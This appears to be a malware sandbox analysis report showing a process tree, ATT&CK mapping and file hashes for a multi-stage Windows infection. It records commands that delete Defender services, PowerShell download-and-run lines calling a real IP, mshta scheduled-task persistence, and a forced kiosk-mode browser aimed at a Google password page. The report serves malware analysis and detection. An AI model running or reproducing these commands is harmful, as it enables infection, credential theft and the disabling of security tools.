C:\Windows\system32\sc.exesc stop "SgrmBroker"8⤵
- Launches sc.exe
PID:2832
-
-
C:\Windows\system32\sc.exesc delete "SgrmBroker"8⤵
- Launches sc.exe
PID:2272
-
-
C:\Windows\system32\reg.exereg delete "HKLM\System\CurrentControlset\Services\SgrmBroker" /f8⤵PID:2460
-
-
C:\Windows\system32\sc.exesc stop "SecurityHealthService"8⤵
- Launches sc.exe
PID:2276
-
-
C:\Windows\system32\sc.exesc delete "SecurityHealthService"8⤵
- Launches sc.exe
PID:2868
-
-
C:\Windows\system32\reg.exereg delete "HKLM\System\CurrentControlset\Services\SecurityHealthService" /f8⤵PID:2972
-
-
C:\Windows\system32\sc.exesc stop "webthreatdefsvc"8⤵
- Launches sc.exe
PID:2900
-
-
C:\Windows\system32\sc.exesc delete "webthreatdefsvc"8⤵
- Launches sc.exe
PID:2976
-
-
C:\Windows\system32\reg.exereg delete "HKLM\System\CurrentControlset\Services\webthreatdefsvc" /f8⤵PID:2844
-
-
C:\Windows\system32\sc.exesc stop "webthreatdefusersvc"8⤵
- Launches sc.exe
PID:2940
-
-
C:\Windows\system32\sc.exesc delete "webthreatdefusersvc"8⤵
- Launches sc.exe
PID:2996
-
-
C:\Windows\system32\reg.exereg delete "HKLM\System\CurrentControlset\Services\webthreatdefusersvc" /f8⤵PID:2156
-
-
C:\Windows\system32\sc.exesc stop "WdNisDrv"8⤵
- Launches sc.exe
PID:2784
-
-
C:\Windows\system32\sc.exesc delete "WdNisDrv"8⤵
- Launches sc.exe
PID:2344
-
-
C:\Windows\system32\reg.exereg delete "HKLM\System\CurrentControlset\Services\WdNisDrv" /f8⤵PID:1468
-
-
C:\Windows\system32\sc.exesc stop "WdBoot"8⤵
- Launches sc.exe
PID:2828
-
-
C:\Windows\system32\sc.exesc delete "WdBoot"8⤵
- Launches sc.exe
PID:1600
-
-
C:\Windows\system32\reg.exereg delete "HKLM\System\CurrentControlset\Services\WdBoot" /f8⤵PID:2580
-
-
C:\Windows\system32\sc.exesc stop "WdFilter"8⤵
- Launches sc.exe
PID:1120
-
-
C:\Windows\system32\sc.exesc delete "WdFilter"8⤵
- Launches sc.exe
PID:1548
-
-
C:\Windows\system32\reg.exereg delete "HKLM\System\CurrentControlset\Services\WdFilter" /f8⤵PID:1940
-
-
C:\Windows\system32\sc.exesc stop "SgrmAgent"8⤵
- Launches sc.exe
PID:1888
-
-
C:\Windows\system32\sc.exesc delete "SgrmAgent"8⤵
- Launches sc.exe
PID:1892
-
-
C:\Windows\system32\reg.exereg delete "HKLM\System\CurrentControlset\Services\SgrmAgent" /f8⤵PID:2256
-
-
C:\Windows\system32\sc.exesc stop "MsSecWfp"8⤵
- Launches sc.exe
PID:2992
-
-
C:\Windows\system32\sc.exesc delete "MsSecWfp"8⤵
- Launches sc.exe
PID:2100
-
-
C:\Windows\system32\reg.exereg delete "HKLM\System\CurrentControlset\Services\MsSecWfp" /f8⤵PID:2720
-
-
C:\Windows\system32\sc.exesc stop "MsSecFlt"8⤵
- Launches sc.exe
PID:1068
-
-
C:\Windows\system32\sc.exesc delete "MsSecFlt"8⤵
- Launches sc.exe
PID:1900
-
-
C:\Windows\system32\reg.exereg delete "HKLM\System\CurrentControlset\Services\MsSecFlt" /f8⤵PID:1976
-
-
C:\Windows\system32\sc.exesc stop "MsSecCore"8⤵
- Launches sc.exe
PID:1208
-
-
C:\Windows\system32\sc.exesc delete "MsSecCore"8⤵
- Launches sc.exe
PID:2608
-
-
C:\Windows\system32\reg.exereg delete "HKLM\System\CurrentControlset\Services\MsSecCore" /f8⤵PID:364
-
-
C:\Windows\system32\schtasks.exeschtasks /Delete /TN "Microsoft\Windows\Windows Defender\Windows Defender Cache Maintenance" /f8⤵PID:2800
-
-
C:\Windows\system32\schtasks.exeschtasks /Delete /TN "Microsoft\Windows\Windows Defender\Windows Defender Cleanup" /f8⤵PID:2244
-
-
C:\Windows\system32\schtasks.exeschtasks /Delete /TN "Microsoft\Windows\Windows Defender\Windows Defender Scheduled Scan" /f8⤵PID:2304
-
-
C:\Windows\system32\schtasks.exeschtasks /Delete /TN "Microsoft\Windows\Windows Defender\Windows Defender Verification" /f8⤵PID:2060
-
-
C:\Windows\system32\sc.exesc stop ddrver8⤵
- Launches sc.exe
PID:1040
-
-
C:\Windows\system32\sc.exesc delete ddrver8⤵
- Launches sc.exe
PID:3052
-
-
-
-
-
-
-
C:\Users\Admin\AppData\Local\Temp\10361130101\38eb6df4e0.exe"C:\Users\Admin\AppData\Local\Temp\10361130101\38eb6df4e0.exe"3⤵
- Executes dropped EXE
- System Location Discovery: System Language Discovery
- Suspicious use of FindShellTrayWindow
- Suspicious use of SendNotifyMessage
PID:1956 -
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c schtasks /create /tn aotfcmaUMkN /tr "mshta C:\Users\Admin\AppData\Local\Temp\BAtZ04Scy.hta" /sc minute /mo 25 /ru "Admin" /f4⤵
- System Location Discovery: System Language Discovery
PID:1496 -
C:\Windows\SysWOW64\schtasks.exeschtasks /create /tn aotfcmaUMkN /tr "mshta C:\Users\Admin\AppData\Local\Temp\BAtZ04Scy.hta" /sc minute /mo 25 /ru "Admin" /f5⤵
- System Location Discovery: System Language Discovery
- Scheduled Task/Job: Scheduled Task
PID:524
-
-
-
C:\Windows\SysWOW64\mshta.exemshta C:\Users\Admin\AppData\Local\Temp\BAtZ04Scy.hta4⤵
- System Location Discovery: System Language Discovery
- Modifies Internet Explorer settings
PID:2072 -
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -WindowStyle Hidden $d=$env:temp+'LIDEUZQB3G3F7ZVBBO8EBBEQRQYSTTUF.EXE';(New-Object System.Net.WebClient).DownloadFile('http://176.113.115.7/mine/random.exe',$d);Start-Process $d;5⤵
- Blocklisted process makes network request
- Command and Scripting Interpreter: PowerShell
- Downloads MZ/PE file
- Loads dropped DLL
- System Location Discovery: System Language Discovery
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:2320 -
C:\Users\Admin\AppData\Local\TempLIDEUZQB3G3F7ZVBBO8EBBEQRQYSTTUF.EXE"C:\Users\Admin\AppData\Local\TempLIDEUZQB3G3F7ZVBBO8EBBEQRQYSTTUF.EXE"6⤵
- Identifies VirtualBox via ACPI registry values (likely anti-VM)
- Checks BIOS information in registry
- Executes dropped EXE
- Identifies Wine through registry keys
- Suspicious use of NtSetInformationThreadHideFromDebugger
- Suspicious behavior: EnumeratesProcesses
PID:2716
-
-
-
-
-
C:\Windows\SysWOW64\cmd.execmd /c ""C:\Users\Admin\AppData\Local\Temp\10361140121\am_no.cmd" "3⤵
- System Location Discovery: System Language Discovery
PID:812 -
C:\Windows\SysWOW64\timeout.exetimeout /t 24⤵
- System Location Discovery: System Language Discovery
- Delays execution with timeout.exe
PID:1676
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c powershell -command "-join ((48..57) + (65..90) + (97..122) | Get-Random -Count 9 | ForEach-Object {[char]$_})"4⤵
- System Location Discovery: System Language Discovery
PID:2680 -
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exepowershell -command "-join ((48..57) + (65..90) + (97..122) | Get-Random -Count 9 | ForEach-Object {[char]$_})"5⤵
- Command and Scripting Interpreter: PowerShell
- System Location Discovery: System Language Discovery
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:1004
-
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c powershell -command "-join ((48..57) + (65..90) + (97..122) | Get-Random -Count 5 | ForEach-Object {[char]$_})"4⤵
- System Location Discovery: System Language Discovery
PID:2996 -
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exepowershell -command "-join ((48..57) + (65..90) + (97..122) | Get-Random -Count 5 | ForEach-Object {[char]$_})"5⤵
- Command and Scripting Interpreter: PowerShell
- System Location Discovery: System Language Discovery
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:2156
-
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c powershell -command "-join ((48..57) + (65..90) + (97..122) | Get-Random -Count 4 | ForEach-Object {[char]$_})"4⤵
- System Location Discovery: System Language Discovery
PID:2516 -
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exepowershell -command "-join ((48..57) + (65..90) + (97..122) | Get-Random -Count 4 | ForEach-Object {[char]$_})"5⤵
- Command and Scripting Interpreter: PowerShell
- System Location Discovery: System Language Discovery
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:1348
-
-
-
C:\Windows\SysWOW64\schtasks.exeschtasks /create /tn "S7LzsmaP49f" /tr "mshta \"C:\Temp\Xpo0sHCje.hta\"" /sc minute /mo 25 /ru "Admin" /f4⤵
- System Location Discovery: System Language Discovery
- Scheduled Task/Job: Scheduled Task
PID:2608
-
-
C:\Windows\SysWOW64\mshta.exemshta "C:\Temp\Xpo0sHCje.hta"4⤵
- System Location Discovery: System Language Discovery
- Modifies Internet Explorer settings
PID:560 -
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -WindowStyle Hidden $d=$env:temp+'\483d2fa8a0d53818306efeb32d3.exe';(New-Object System.Net.WebClient).DownloadFile('http://176.113.115.7/mine/random.exe',$d);Start-Process $d;5⤵
- Blocklisted process makes network request
- Command and Scripting Interpreter: PowerShell
- Downloads MZ/PE file
- System Location Discovery: System Language Discovery
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:2616 -
C:\Users\Admin\AppData\Local\Temp\483d2fa8a0d53818306efeb32d3.exe"C:\Users\Admin\AppData\Local\Temp\483d2fa8a0d53818306efeb32d3.exe"6⤵
- Identifies VirtualBox via ACPI registry values (likely anti-VM)
- Checks BIOS information in registry
- Executes dropped EXE
- Identifies Wine through registry keys
- Suspicious use of NtSetInformationThreadHideFromDebugger
- Suspicious behavior: EnumeratesProcesses
PID:2660
-
-
-
-
-
C:\Users\Admin\AppData\Local\Temp\10361330101\0b8eec4302.exe"C:\Users\Admin\AppData\Local\Temp\10361330101\0b8eec4302.exe"3⤵
- Identifies VirtualBox via ACPI registry values (likely anti-VM)
- Checks BIOS information in registry
- Executes dropped EXE
- Identifies Wine through registry keys
- Suspicious use of NtSetInformationThreadHideFromDebugger
- System Location Discovery: System Language Discovery
- Suspicious behavior: EnumeratesProcesses
PID:2380
-
-
C:\Users\Admin\AppData\Local\Temp\10361340101\ef03f308e2.exe"C:\Users\Admin\AppData\Local\Temp\10361340101\ef03f308e2.exe"3⤵
- Identifies VirtualBox via ACPI registry values (likely anti-VM)
- Checks BIOS information in registry
- Executes dropped EXE
- Identifies Wine through registry keys
- Suspicious use of NtSetInformationThreadHideFromDebugger
- System Location Discovery: System Language Discovery
- Suspicious behavior: EnumeratesProcesses
PID:2052
-
-
C:\Users\Admin\AppData\Local\Temp\10361350101\425b117859.exe"C:\Users\Admin\AppData\Local\Temp\10361350101\425b117859.exe"3⤵
- Identifies VirtualBox via ACPI registry values (likely anti-VM)
- Checks BIOS information in registry
- Executes dropped EXE
- Identifies Wine through registry keys
- Suspicious use of NtSetInformationThreadHideFromDebugger
- System Location Discovery: System Language Discovery
- Suspicious behavior: EnumeratesProcesses
PID:2832
-
-
C:\Users\Admin\AppData\Local\Temp\10361360101\56d42e9071.exe"C:\Users\Admin\AppData\Local\Temp\10361360101\56d42e9071.exe"3⤵
- Executes dropped EXE
- System Location Discovery: System Language Discovery
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of FindShellTrayWindow
- Suspicious use of SendNotifyMessage
PID:2376 -
C:\Windows\SysWOW64\taskkill.exetaskkill /F /IM firefox.exe /T4⤵
- System Location Discovery: System Language Discovery
- Kills process with taskkill
- Suspicious use of AdjustPrivilegeToken
PID:1632
-
-
C:\Windows\SysWOW64\taskkill.exetaskkill /F /IM chrome.exe /T4⤵
- System Location Discovery: System Language Discovery
- Kills process with taskkill
- Suspicious use of AdjustPrivilegeToken
PID:1700
-
-
C:\Windows\SysWOW64\taskkill.exetaskkill /F /IM msedge.exe /T4⤵
- System Location Discovery: System Language Discovery
- Kills process with taskkill
- Suspicious use of AdjustPrivilegeToken
PID:2916
-
-
C:\Windows\SysWOW64\taskkill.exetaskkill /F /IM opera.exe /T4⤵
- System Location Discovery: System Language Discovery
- Kills process with taskkill
- Suspicious use of AdjustPrivilegeToken
PID:1676
-
-
C:\Windows\SysWOW64\taskkill.exetaskkill /F /IM brave.exe /T4⤵
- System Location Discovery: System Language Discovery
- Kills process with taskkill
- Suspicious use of AdjustPrivilegeToken
PID:1156
-
-
C:\Program Files\Mozilla Firefox\firefox.exe"C:\Program Files\Mozilla Firefox\firefox.exe" --kiosk "https://youtube.com/account?=https://accounts.google.com/v3/signin/challenge/pwd" --no-default-browser-check --disable-popup-blocking4⤵PID:2868
-
C:\Program Files\Mozilla Firefox\firefox.exe"C:\Program Files\Mozilla Firefox\firefox.exe" --kiosk https://youtube.com/account?=https://accounts.google.com/v3/signin/challenge/pwd --no-default-browser-check --disable-popup-blocking5⤵
- Checks processor information in registry
- Modifies registry class
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of FindShellTrayWindow
- Suspicious use of SendNotifyMessage
PID:1120 -
C:\Program Files\Mozilla Firefox\firefox.exe"C:\Program Files\Mozilla Firefox\firefox.exe" -contentproc --channel="1120.0.926448946\333588246" -parentBuildID 20221007134813 -prefsHandle 1240 -prefMapHandle 1232 -prefsLen 20847 -prefMapSize 233444 -appDir "C:\Program Files\Mozilla Firefox\browser" - {cb0f76b8-bd6c-471e-a158-3f72c907bb55} 1120 "\\.\pipe\gecko-crash-server-pipe.1120" 1316 112f0e58 gpu6⤵PID:1452
-
-
C:\Program Files\Mozilla Firefox\firefox.exe"C:\Program Files\Mozilla Firefox\firefox.exe" -contentproc --channel="1120.1.969707444\1910969433" -parentBuildID 20221007134813 -prefsHandle 1492 -prefMapHandle 1488 -prefsLen 21708 -prefMapSize 233444 -appDir "C:\Program Files\Mozilla Firefox\browser" - {779b2f2e-ebcc-438a-8776-249b7b194ba7} 1120 "\\.\pipe\gecko-crash-server-pipe.1120" 1504 f74858 socket6⤵PID:1744
-
-
C:\Program Files\Mozilla Firefox\firefox.exe"C:\Program Files\Mozilla Firefox\firefox.exe" -contentproc --channel="1120.2.596183641\1419293842" -childID 1 -isForBrowser -prefsHandle 2100 -prefMapHandle 2096 -prefsLen 21746 -prefMapSize 233444 -jsInitHandle 864 -jsInitLen 246848 -a11yResourceId 64 -parentBuildID 20221007134813 -appDir "C:\Program Files\Mozilla Firefox\browser" - {9a5357a2-aaf5-4fd3-b84c-90bf2c09e4db} 1120 "\\.\pipe\gecko-crash-server-pipe.1120" 2112 11273958 tab6⤵PID:2264
-
-
C:\Program Files\Mozilla Firefox\firefox.exe"C:\Program Files\Mozilla Firefox\firefox.exe" -contentproc --channel="1120.3.2006893928\692545584" -childID 2 -isForBrowser -prefsHandle 2932 -prefMapHandle 2928 -prefsLen 26216 -prefMapSize 233444 -jsInitHandle 864 -jsInitLen 246848 -a11yResourceId 64 -parentBuildID 20221007134813 -appDir "C:\Program Files\Mozilla Firefox\browser" - {c0b67bbc-86bf-4a53-9825-fba08e09e75b} 1120 "\\.\pipe\gecko-crash-server-pipe.1120" 2944 f63658 tab6⤵PID:1596
-
-
C:\Program Files\Mozilla Firefox\firefox.exe"C:\Program Files\Mozilla Firefox\firefox.exe" -contentproc --channel="1120.4.319086317\1618655592" -childID 3 -isForBrowser -prefsHandle 3408 -prefMapHandle 3852 -prefsLen 26356 -prefMapSize 233444 -jsInitHandle 864 -jsInitLen 246848 -a11yResourceId 64 -parentBuildID 20221007134813 -appDir "C:\Program Files\Mozilla Firefox\browser" - {002289d0-b713-4f39-8505-ca92839c9254} 1120 "\\.\pipe\gecko-crash-server-pipe.1120" 3860 2032dc58 tab6⤵PID:3348
-
-
C:\Program Files\Mozilla Firefox\firefox.exe"C:\Program Files\Mozilla Firefox\firefox.exe" -contentproc --channel="1120.5.933580643\1147832065" -childID 4 -isForBrowser -prefsHandle 3952 -prefMapHandle 3792 -prefsLen 26356 -prefMapSize 233444 -jsInitHandle 864 -jsInitLen 246848 -a11yResourceId 64 -parentBuildID 20221007134813 -appDir "C:\Program Files\Mozilla Firefox\browser" - {6f066359-25df-4c1a-bcc6-4b3da617a9b4} 1120 "\\.\pipe\gecko-crash-server-pipe.1120" 3940 2032d058 tab6⤵PID:3376
-
-
C:\Program Files\Mozilla Firefox\firefox.exe"C:\Program Files\Mozilla Firefox\firefox.exe" -contentproc --channel="1120.6.1378481849\2134279151" -childID 5 -isForBrowser -prefsHandle 4160 -prefMapHandle 4164 -prefsLen 26356 -prefMapSize 233444 -jsInitHandle 864 -jsInitLen 246848 -a11yResourceId 64 -parentBuildID 20221007134813 -appDir "C:\Program Files\Mozilla Firefox\browser" - {5ef65da4-7c77-45ca-9ab1-85887e7e38a9} 1120 "\\.\pipe\gecko-crash-server-pipe.1120" 4144 1ffa2258 tab6⤵PID:3404
-
-
-
-
-
C:\Users\Admin\AppData\Local\Temp\10361370101\ba43420fc1.exe"C:\Users\Admin\AppData\Local\Temp\10361370101\ba43420fc1.exe"3⤵
- Modifies Windows Defender DisableAntiSpyware settings
- Modifies Windows Defender Real-time Protection settings
- Modifies Windows Defender TamperProtection settings
- Modifies Windows Defender notification settings
- Identifies VirtualBox via ACPI registry values (likely anti-VM)
- Checks BIOS information in registry
- Executes dropped EXE
- Identifies Wine through registry keys
- Windows security modification
- Suspicious use of NtSetInformationThreadHideFromDebugger
- System Location Discovery: System Language Discovery
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:760
-
-
C:\Users\Admin\AppData\Local\Temp\10361380101\7IIl2eE.exe"C:\Users\Admin\AppData\Local\Temp\10361380101\7IIl2eE.exe"3⤵
- Executes dropped EXE
- Drops file in Windows directory
- System Location Discovery: System Language Discovery
PID:1620 -
C:\Windows\SysWOW64\CMD.exe"C:\Windows\system32\CMD.exe" /c copy Expectations.cab Expectations.cab.bat & Expectations.cab.bat4⤵
- System Location Discovery: System Language Discovery
PID:3384 -
C:\Windows\SysWOW64\tasklist.exetasklist5⤵
- Enumerates processes with tasklist
- System Location Discovery: System Language Discovery
- Suspicious use of AdjustPrivilegeToken
PID:3256
-
-
C:\Windows\SysWOW64\findstr.exefindstr /I "opssvc wrsa"5⤵
- System Location Discovery: System Language Discovery
PID:3260
-
-
C:\Windows\SysWOW64\tasklist.exetasklist5⤵
- Enumerates processes with tasklist
- System Location Discovery: System Language Discovery
- Suspicious use of AdjustPrivilegeToken
PID:3472
-
-
C:\Windows\SysWOW64\findstr.exefindstr "SophosHealth bdservicehost AvastUI AVGUI nsWscSvc ekrn"5⤵
- System Location Discovery: System Language Discovery
PID:3508
-
-
C:\Windows\SysWOW64\cmd.execmd /c md 4183775⤵
- System Location Discovery: System Language Discovery
PID:1784
-
-
C:\Windows\SysWOW64\extrac32.exeextrac32 /Y /E Leon.cab5⤵
- System Location Discovery: System Language Discovery
PID:2648
-
-
C:\Windows\SysWOW64\findstr.exefindstr /V "BEVERAGES" Compilation5⤵
- System Location Discovery: System Language Discovery
PID:3760
-
-
C:\Windows\SysWOW64\cmd.execmd /c copy /b 418377\Passwords.com + Playing + New + Realized + Uw + Jpeg + Badly + Asbestos + Seeds + Service + Basis + Via 418377\Passwords.com5⤵PID:3628
-
-
C:\Windows\SysWOW64\cmd.execmd /c copy /b ..\Pendant.cab + ..\Visitor.cab + ..\Illegal.cab + ..\Suddenly.cab + ..\Theology.cab + ..\Kidney.cab + ..\Flying.cab + ..\Tigers.cab N5⤵PID:3884
-
-
C:\Users\Admin\AppData\Local\Temp\418377\Passwords.comPasswords.com N5⤵PID:3920
-
-
C:\Windows\SysWOW64\choice.exechoice /d y /t 55⤵PID:3088
-
-
-
-
C:\Users\Admin\AppData\Local\Temp\10361390101\TbV75ZR.exe"C:\Users\Admin\AppData\Local\Temp\10361390101\TbV75ZR.exe"3⤵
- Executes dropped EXE
PID:2056 -
C:\Windows\system32\WerFault.exeC:\Windows\system32\WerFault.exe -u -p 2056 -s 444⤵PID:2412
-
-
-
C:\Users\Admin\AppData\Local\Temp\10361400101\Rm3cVPI.exe"C:\Users\Admin\AppData\Local\Temp\10361400101\Rm3cVPI.exe"3⤵
- Executes dropped EXE
- System Location Discovery: System Language Discovery
PID:3344
-
-
C:\Users\Admin\AppData\Local\Temp\10361410101\d0210ba08f.exe"C:\Users\Admin\AppData\Local\Temp\10361410101\d0210ba08f.exe"3⤵PID:3272
-
C:\Users\Admin\AppData\Local\Temp\svchost015.exe"C:\Users\Admin\AppData\Local\Temp\10361410101\d0210ba08f.exe"4⤵PID:3420
-
-
-
C:\Users\Admin\AppData\Local\Temp\10361420101\xZRvIQ5.exe"C:\Users\Admin\AppData\Local\Temp\10361420101\xZRvIQ5.exe"3⤵PID:3676
-
-
C:\Users\Admin\AppData\Local\Temp\10361440101\u75a1_003.exe"C:\Users\Admin\AppData\Local\Temp\10361440101\u75a1_003.exe"3⤵PID:3892
-
-
C:\Users\Admin\AppData\Local\Temp\10361450101\EPTwCQd.exe"C:\Users\Admin\AppData\Local\Temp\10361450101\EPTwCQd.exe"3⤵PID:3212
-
-
C:\Users\Admin\AppData\Local\Temp\10361460101\8011f3bdeb.exe"C:\Users\Admin\AppData\Local\Temp\10361460101\8011f3bdeb.exe"3⤵PID:2292
-
C:\Users\Admin\AppData\Local\Temp\svchost015.exe"C:\Users\Admin\AppData\Local\Temp\10361460101\8011f3bdeb.exe"4⤵PID:3708
-
-
-
C:\Users\Admin\AppData\Local\Temp\10361470101\Or1ARiR.exe"C:\Users\Admin\AppData\Local\Temp\10361470101\Or1ARiR.exe"3⤵PID:1496
-
-
Network
MITRE ATT&CK Enterprise v15
Execution
Command and Scripting Interpreter
1PowerShell
1Scheduled Task/Job
1Scheduled Task
1System Services
2Service Execution
2Persistence
Boot or Logon Autostart Execution
1Registry Run Keys / Startup Folder
1Create or Modify System Process
6Windows Service
6Scheduled Task/Job
1Scheduled Task
1Privilege Escalation
Boot or Logon Autostart Execution
1Registry Run Keys / Startup Folder
1Create or Modify System Process
6Windows Service
6Scheduled Task/Job
1Scheduled Task
1Defense Evasion
File and Directory Permissions Modification
1Impair Defenses
6Disable or Modify Tools
5Modify Registry
8Subvert Trust Controls
1Install Root Certificate
1Virtualization/Sandbox Evasion
2Replay Monitor
Loading Replay Monitor...
Downloads
-
Filesize
71KB
MD583142242e97b8953c386f988aa694e4a
SHA1833ed12fc15b356136dcdd27c61a50f59c5c7d50
SHA256d72761e1a334a754ce8250e3af7ea4bf25301040929fd88cf9e50b4a9197d755
SHA512bb6da177bd16d163f377d9b4c63f6d535804137887684c113cc2f643ceab4f34338c06b5a29213c23d375e95d22ef417eac928822dfb3688ce9e2de9d5242d10
-
C:\Users\Admin\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\8P9TO0C6\service[1].htm
Filesize1B
MD5cfcd208495d565ef66e7dff9f98764da
SHA1b6589fc6ab0dc82cf12099d1c2d40ab994e8410c
SHA2565feceb66ffc86f38d952786c6d696c79c2dbc239dd4e91b46729d73a27fb57e9
SHA51231bca02094eb78126a517b206a88c73cfa9ec6f704c7030d18212cace820f025f00bf0ea68dbf3f3a5436ca63b53bf7bf80ad8d5de7d8359d0b7fed9dbc3ab99
-
C:\Users\Admin\AppData\Local\Mozilla\Firefox\Profiles\bhzluvd5.default-release\activity-stream.discovery_stream.json.tmp
Filesize23KB
MD5dffbb1b198071986aac50bd27adf696b
SHA1443bb489fc5b870546533e01de9181bd6f3f193a
SHA25611eb95ff807ac4b49f2e40e4646c9f85d64b7b688d83c85cbdb59b9eb37b03e5
SHA512ba425ed921445c7a07d3b55bf1b29266f143462190b3961fa9de092baf10d50a217e4a1734dcd2e5d22503c37dcf8c378124cccec6f37a5f8a11e3e1defb79fd
-
C:\Users\Admin\AppData\Local\Mozilla\Firefox\Profiles\bhzluvd5.default-release\settings\main\ms-language-packs\browser\newtab\asrouter.ftl
Filesize15KB
MD596c542dec016d9ec1ecc4dddfcbaac66
SHA16199f7648bb744efa58acf7b96fee85d938389e4
SHA2567f32769d6bb4e875f58ceb9e2fbfdc9bd6b82397eca7a4c5230b0786e68f1798
SHA512cda2f159c3565bc636e0523c893b293109de2717142871b1ec78f335c12bad96fc3f62bcf56a1a88abdeed2ac3f3e5e9a008b45e24d713e13c23103acc15e658
-
Filesize
1.8MB
MD5f952e65c947bc0044a2fcbe292da751e
SHA13b1969667c2e1f80ff41941b524a03ffb6a597f7
SHA2560f426e5beaadc7e1e22e8fa061414709bc2fe8adcd54bdd9e38c6c995cbcbf05
SHA512eaa6e30aa016eb8762545e0925cd33f1ca1898185ab21ca8057d2337555993914ce8f41485ccb7efab7633d805ff0fb89e777bd2b2bba8b86ea21c10993945b9
-
Filesize
1.2MB
MD5646254853368d4931ced040b46e9d447
SHA1c9e4333c6feb4f0aeedf072f3a293204b9e81e28
SHA2565a6764d23bb3d50f08f15b95e214a6dca0afb78e7416a21b72982c3649a49e9e
SHA512485f252cd358ea41be648e013dc3ddeee1e57f8dea3ef42a5c8236a9769e7ebcf8bae1d5a36f55b6fb2cdcbbcf1878eca7d7885b63445cb081688a9512512819
-
Filesize
974KB
MD571256c11265d9762446983178290b1d2
SHA13578f76f0705950d07affe6f0fcdfcd5ec8c66c6
SHA2568e5021734b22342186a7b51235fbccc3d72ca27aa940c5b5c5e876d9fd406a85
SHA512aa9e8353c5eab9e18ced0f2aa6770ba39bd622bfa3d9e1581c84d6bbf6f9dd0d02cf1f750b003afe1037b9be2e71c0be5581a6e9c4dc83d9297aed5bad08c98b
-
Filesize
2.0MB
MD528b543db648763fac865cab931bb3f91
SHA1b6688b85d6c6d1bd45a3db2d108b6acf7467b0b4
SHA256701b7ef0b368ddbe9e3d2ddaaaf10284287f38799e536336dc4c821930f13906
SHA5127d514fc036efc8d57d400e7e84f5b565f40dc0f74a536c708b3fe5d6725e5d4541157e29f514e0706fad6d4159e0b863bedf757eca4df3e87927e462502a02d2
-
Filesize
4.3MB
MD5f1cce81ccd458d9ffd1dd39436a178ee
SHA11f7c8d2294ee5c6cdfa258afafb5616e397e48e9
SHA256e624919519033cbe67106c0cfee970a714de3e6fe286d6b149a731dda6188c0e
SHA512a687206e69f99c263530c0e90ee88a3657f3dbdcef5c91b19c235f90eea524e8e3a33bf75b70d1aa76bb9371e7665dd81e88dcb75f0b7e225731399b04521c91
-
Filesize
4.5MB
MD561d126d9ca1152e89aaad3e01b6ef706
SHA1a0cf543ddc2220f413bd1b8c65b312fe601e087e
SHA2566741e95aedb72280e5d58daf0149b734036694903e9c1aa4f80a936fdefbd04b
SHA512ab1d74fa1fc59b35c5607f341fc0ec21615fb8ba5f47932f549feb092196ca574afab7ac4bd2217a7c709f0939316f913fffd02017d696c2fe2cd6da8b7c6c67
-
Filesize
712KB
MD519cc136b64066f972db18ef9cc2da8ca
SHA1b6c139090c0e3d13f4e67e4007cec0589820cf91
SHA256d20816d1e73f63beaea4bee9afc4388d07b7235a3a332674e969b646cc454597
SHA512a3e5f486289d49978ad4e76c83667ba065efe0d061de7c9b4a88b68a167a7ac0e09d850583e15f274862880dcb6f76c51586bbc4be53419d403a0c7a3ce14434
-
Filesize
354KB
MD527f0df9e1937b002dbd367826c7cfeaf
SHA17d66f804665b531746d1a94314b8f78343e3eb4f
SHA256aff35e23562fc36f4b8f6b5bf95eb5dbf11e8af6674e3212aa0c4077ddfe8209
SHA512ee4e7e5a8ffe193a8487dd4e9bfb13affa74cacdf250a4e22ed0fc653bbfb615855771dd41d295be905bed311c1690874ce61a5a9d9a5745b4bc550715c7de17
-
Filesize
1.8MB
MD55107aa3fbcc40b1347d07558d56cb9e2
SHA18c8e56156544b1e2841416e9d36dd2ee25d6fb8d
SHA25654d5cbab5a7c8ab52997d52dd53e2f8ac7442bf6db4f7af2cc8541d3ec4f086c
SHA51268c33324dbfc27481826c9e79258a2765438fd53b3f60ca5067bc8fb28f793ce8346dce581cb5427273a22f1a23c85ecbde0dffbf6b4b56d1c4047dacd5a2f65
-
Filesize
708KB
MD591e32ed673b7f332f036e2909f40a633
SHA1d1442262f1df93440420fba159e826f1ddec5b13
SHA256a297911b8056d76502df7da401788c421e4ab5165f9f857e1da0bf125a01c534
SHA512d443e090370dd88048a987305aa5fa3c67e4ee5b2d0f2e7ac73f06e48a3555559c9627c76355ee2ecef096bfb3e08cea6cc59d1ee106e9461f29384c61f1cca1
-
Filesize
2.5MB
MD5513b84f75edfcbb46c69c030e16402d7
SHA13d63e0efdea421861901056139463fb345000d21
SHA256cc42ef8603fd891e0f4c72fe84ec28790c6f6d1d47009f86c22d38ef5d8d7b6b
SHA512234785f787deb40dc35cd72b2fe711bc44d04a359dd4d2cb296eaae821035f46fdae3d0a2f805b8a4907bb21acbe6d9f54ad95f8fd3bbd63068d1456160d7a90
-
Filesize
429KB
MD522892b8303fa56f4b584a04c09d508d8
SHA1e1d65daaf338663006014f7d86eea5aebf142134
SHA25687618787e1032bbf6a6ca8b3388ea3803be20a49e4afaba1df38a6116085062f
SHA512852dcc1470f33bc601a814f61a37c1f5a10071ff3354f101be0ef9aa5ac62b4433a732d02acd4247c2a1819fef9adef7dd6722ee8eb9e8501bac033eb877c744
-
Filesize
7.6MB
MD5bddd4de8153309dd3ae1b892b1157df6
